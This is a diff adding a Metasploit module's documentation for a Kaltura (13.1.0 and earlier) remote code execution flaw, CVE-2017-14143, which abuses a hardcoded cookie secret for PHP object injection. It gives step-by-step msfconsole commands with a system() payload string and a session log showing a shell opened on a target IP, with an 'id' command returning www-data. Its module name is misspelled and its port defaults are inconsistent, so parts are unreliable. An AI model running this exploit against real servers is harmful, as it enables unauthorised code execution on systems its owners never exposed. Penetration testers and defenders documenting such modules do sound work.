Documentation for Kaltura <= 13.1.0 RCE (CVE-2017-14143)

Author: Pushpamk

documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md

@@ -0,0 +1,46 @@
+## Description 
+
+The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. 
+ 
+
+## Vulnerable Application
+
+ This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
+ Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
+
+
+## Verification Steps
+
+ 1. Start msfconsole
+ 2. use exploit/linux/http/kaltura_unserialize_cookie_rce
+ 3. set RHOST https://example.com (or IP address)
+ 4. set ENTRYID 0_xxxxxxxx
+ 5. set payload generic/custom
+ 6. set payloadstr "system('command you want to execute, eg.- ls -la');"
+ 7. run
+
+
+## Options
+
+ default RPORT 4444
+
+
+## Scenarios
+
+ ```
+ msf use exploits/linux/http/kaltura_unserialize_cookie_rce
+ msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
+ RHOST => 46.101.209.202
+ msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
+ LHOST => 192.168.1.16
+ msf exploit(kalkutra_unseialize_cookie_rce)>check
+ [+] 46.101.209.202:4444 The target is vulnerable.
+ msf exploit(kalkutra_unseialize_cookie_rce)>run
+ [*] Started bind handler
+ [*] Output:
+ [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  ```
+